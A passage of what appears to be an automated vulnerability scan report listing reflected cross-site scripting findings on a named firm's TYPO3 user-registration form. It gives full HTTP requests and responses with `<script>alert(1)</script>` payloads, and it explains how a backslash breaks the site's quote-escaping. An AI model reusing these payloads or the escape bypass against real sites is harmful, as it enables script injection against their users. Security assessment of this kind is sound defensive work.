   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
il_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3');
   updateForm('fe_users_form','FE[fe_users][0]','13d35\\';alert(1)//8e6a0f23626');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.166. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B1%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B1%5D request parameter is copied into the HTML document as plain text between tags. The payload 79bfb<script>alert(1)</script>bbad2d37fb0 was submitted in the FE%5Bfe_users%5D%5B1%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=079bfb<script>alert(1)</script>bbad2d37fb0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','079bfb<script>alert(1)</script>bbad2d37fb0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.167. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B2%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B2%5D request parameter is copied into the HTML document as plain text between tags. The payload ae940<script>alert(1)</script>a026835ab0d was submitted in the FE%5Bfe_users%5D%5B2%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0ae940<script>alert(1)</script>a026835ab0d&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:31 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0ae940<script>alert(1)</script>a026835ab0d');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.168. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B3%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B3%5D request parameter is copied into the HTML document as plain text between tags. The payload c8d1b<script>alert(1)</script>d23dadbefc1 was submitted in the FE%5Bfe_users%5D%5B3%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0c8d1b<script>alert(1)</script>d23dadbefc1&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:41 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0c8d1b<script>alert(1)</script>d23dadbefc1');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.169. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B4%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B4%5D request parameter is copied into the HTML document as plain text between tags. The payload e512f<script>alert(1)</script>d93c4114a89 was submitted in the FE%5Bfe_users%5D%5B4%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0e512f<script>alert(1)</script>d93c4114a89&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:58 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0e512f<script>alert(1)</script>d93c4114a89');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.170. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B5%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B5%5D request parameter is copied into the HTML document as plain text between tags. The payload bec11<script>alert(1)</script>fe856d5f00 was submitted in the FE%5Bfe_users%5D%5B5%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0bec11<script>alert(1)</script>fe856d5f00&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27282

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0bec11<script>alert(1)</script>fe856d5f00');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.171. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B6%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B6%5D request parameter is copied into the HTML document as plain text between tags. The payload 27942<script>alert(1)</script>05f26062564 was submitted in the FE%5Bfe_users%5D%5B6%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=027942<script>alert(1)</script>05f26062564&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','027942<script>alert(1)</script>05f26062564');
   /*]]>
...[SNIP]...

4.172. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Baddress%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Baddress%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef89\'%3balert(1)//3af9dc914c6 was submitted in the FE%5Bfe_users%5D%5Baddress%5D parameter. This input was echoed as 7ef89\\';alert(1)//3af9dc914c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=37ef89\'%3balert(1)//3af9dc914c6&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:23:49 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
'FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','37ef89\\';alert(1)//3af9dc914c6');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateF
...[SNIP]...

4.173. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcity%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcity%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21752\'%3balert(1)//21ef1916b41 was submitted in the FE%5Bfe_users%5D%5Bcity%5D parameter. This input was echoed as 21752\\';alert(1)//21ef1916b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=321752\'%3balert(1)//21ef1916b41&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:24:46 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
